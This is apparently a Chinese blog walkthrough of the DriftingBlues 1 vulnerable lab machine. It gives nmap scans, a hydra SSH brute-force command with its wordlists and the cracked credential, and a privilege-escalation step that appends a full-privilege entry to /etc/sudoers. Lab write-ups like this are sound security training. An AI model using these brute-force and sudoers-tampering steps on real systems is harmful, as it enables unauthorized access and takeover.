首页 > 其他分享 >vulhub-driftingblues

vulhub-driftingblues

时间:2024-02-23 14:11:06浏览次数:25  
标签:vulhub 22 192.168 driftingblues tcp 56.108 ssh eric

driftingblues1

nmap -sn 192.168.56.1/24  # 主机ip发现
# 端口扫描
nmap -A -v 192.168.56.108

Discovered open port 80/tcp on 192.168.56.108
Discovered open port 22/tcp on 192.168.56.108
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ca:e6:d1:1f:27:f2:62:98:ef:bf:e4:38:b5:f1:67:77 (RSA)
|   256 a8:58:99:99:f6:81:c4:c2:b4:da:44:da:9b:f3:b8:9b (ECDSA)
|_  256 39:5b:55:2a:79:ed:c3:bf:f5:16:fd:bd:61:29:2a:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Drifting Blues Tech
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirsearch gobuster 爆破目录

页面源代码发现:

base64解码并访问

上网搜索,获得:

主页存在域名,配置到hosts

爆破子域名+目录,得到

爆破ssh

hydra -L tmp2.txt  -P password.txt  ssh://192.168.56.108:22
# [22][ssh] host: 192.168.56.108   login: eric   password: 1mw4ckyyucky6

# password.txt
1mw4ckyyucky0
1mw4ckyyucky1
1mw4ckyyucky2
1mw4ckyyucky3
1mw4ckyyucky4
1mw4ckyyucky5
1mw4ckyyucky6
1mw4ckyyucky7
1mw4ckyyucky8
1mw4ckyyucky9
1mw4ckyyucky
#user.txt
eric
sheryl
db
root

使用 linpeas.sh 和 pspy64

在后门文件中反弹shell 经测试,总是不成功,eric用户可使用bash反弹,root无法反弹

向emergency写入

echo "eric ALL=(ALL:ALL) ALL" >> /etc/sudoers

 

标签:vulhub,22,192.168,driftingblues,tcp,56.108,ssh,eric
From: https://www.cnblogs.com/zhh567/p/18029327

相关文章

  • 【Vulnhub 靶场】【DriftingBlues: 9 (final)】【简单】【20210509】
    1、环境介绍靶场介绍:https://www.vulnhub.com/entry/driftingblues-9-final,695/靶场下载:https://download.vulnhub.com/driftingblues/driftingblues9.ova靶场难度:简单发布日期:2021年05月09日文件大小:738MB靶场作者:tasiyanci靶场描述:getflags打靶耗时:2+小时打靶关键:......
  • vulhub中spring的CVE-2018-1273漏洞复现
    ​ 1.影响版本SpringDataCommons1.13-1.13.10(IngallsSR10)SpringDataREST2.6-2.6.10(IngallsSR10)SpringDataCommons2.0to2.0.5(KaySR5)SpringDataREST3.0-3.0.5(KaySR5)2.漏洞原理SpringData是一个用于简化数据库访问,并支持云服务的开源框......
  • vulhub thinphp 5.0.23 学习复现
     靶场是基于vulhub的靶场docker-composeup-d 启动靶场并且漏洞环境是thinkphp5.0.23 现在验证漏洞列出了当前目录文件 可以,验证完了,看到漏洞存在 现在想尝试弹一个shell,开启监听  ok!bp可以,但是,查看服务器并未得到shell不清楚是为什么,等下再看,先拿web......
  • vulhub的使用
    1、将搭载的vulhub靶场的虚拟机当作靶机通过ssh服务连接靶机vulhub漏洞库已经搭建在根目录下,目录名为“vulhub-master”: 2、用cd命令逐级进入其中,根据目录名选择想要复现的漏洞,例如下图想要复现wordpress的漏洞,就cd进入wordpress目录下,有时候其中会有多个漏洞,就会有多个文件......
  • vulhub靶场搭建
    配置Docker1、更新sudoapt-getupdate2、下载安装dockersudoaptinstalldocker.io中间碰到询问回复y 3、查看是否安装成功docker-v 4、安装docker-composeaptinstalldocker-compose 5、查看docker-compose安装是否成功docker-compose-v6、配置vulhub......
  • Centos7环境下Docker搭建vulhub
    @[toc]Docker是一个开源的应用容器引擎,可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。varcode="7ba6071e-929c-4a38-8b5d-49be072baba6"vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机......
  • Vulnhub: DriftingBlues: 1靶机
    kali:192.168.111.111靶机:192.168.111.215信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.21580端口首页源码访问noteforkingfish.txt,发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/ser......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
  • Vulnhub: DriftingBlues: 6靶机
    kali:192.168.111.111靶机:192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录:/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,......